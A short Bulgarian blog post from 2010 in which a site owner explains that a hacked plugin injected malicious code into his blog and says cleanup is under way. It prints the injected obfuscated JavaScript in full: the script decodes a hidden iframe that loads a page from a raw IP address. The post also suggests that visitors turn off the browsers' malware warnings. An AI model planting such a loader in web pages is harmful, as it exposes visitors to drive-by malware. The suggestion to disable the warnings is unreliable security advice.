Злонамерен ли е Peter.and.Bilyana.net?

Начало

11/13/10 09:42
(http://psabev.blogspot.com/)

Злонамерен ли е Peter.and.Bilyana.net?

Потребителите на FireFox и Chrome сигурно са забелязали страшните предупреждения, ако влязат в нашия сайт. Истината е, че пробив в сигурността на някой от plugin-ите (заподозряни са Sociable и Wordbooker) е довел до вкарването на следния „красив“ скрипт в блога:

<script>var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm
nopqrstuvwxyz0123456789+/=";var WqKY="PGlmcmFtZSBzcmM9Imh0dH
A6Ly8xOTUuMjI2LjIyMC4xMTIvfmFkbWluLy4sbW5idi90cmYucGhwP3NjaD
1zY2hlbWExJnM9a2V5d29yZCIgd2lkdGg9IjAiIGhlaWdodD0iMCIgZnJhbW
Vib3JkZXI9IjAiPjwvaWZyYW1lPg==";var K7dv="";var QXcJ,mDTZ,wk
w2,uEFX,CF6S,Vthb,VlmL="";var i=0;var base64test=/[^A-Za-z0-
9\+\/\=]/g;WqKY=WqKY.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{uE
FX=k0e0y0S.indexOf(WqKY.charAt(i++));CF6S=k0e0y0S.indexOf(Wq
KY.charAt(i++));Vthb=k0e0y0S.indexOf(WqKY.charAt(i++));VlmL=
k0e0y0S.indexOf(WqKY.charAt(i++));QXcJ=(uEFX<<2)|(CF6S>>4);m
DTZ=((CF6S&15)<<4)|(Vthb>>2);wkw2=((Vthb&3)<<6)|VlmL;K7dv=K7
dv+String.fromCharCode(QXcJ);if(Vthb!=64){K7dv=K7dv+String.f
romCharCode(mDTZ);}if(VlmL!=64){K7dv=K7dv+String.fromCharCod
e(wkw2);}QXcJ=mDTZ=wkw2="";uEFX=CF6S=Vthb=VlmL="";}while(i<W
qKY.length);document.write(unescape(K7dv)); </script>

Предприел съм нужните действия, но ще отнеме няколко дни и вече няма проблеми със сайта, но ще минат няколко дни, докато от Google вдигнат карантината. Дотогава не е проблем да се сърфира с Internet Explorer например, както и да се изключат предупрежденията във Firefox и Chrome.

Съжаляваме за неудобството и ще ви държим в течение.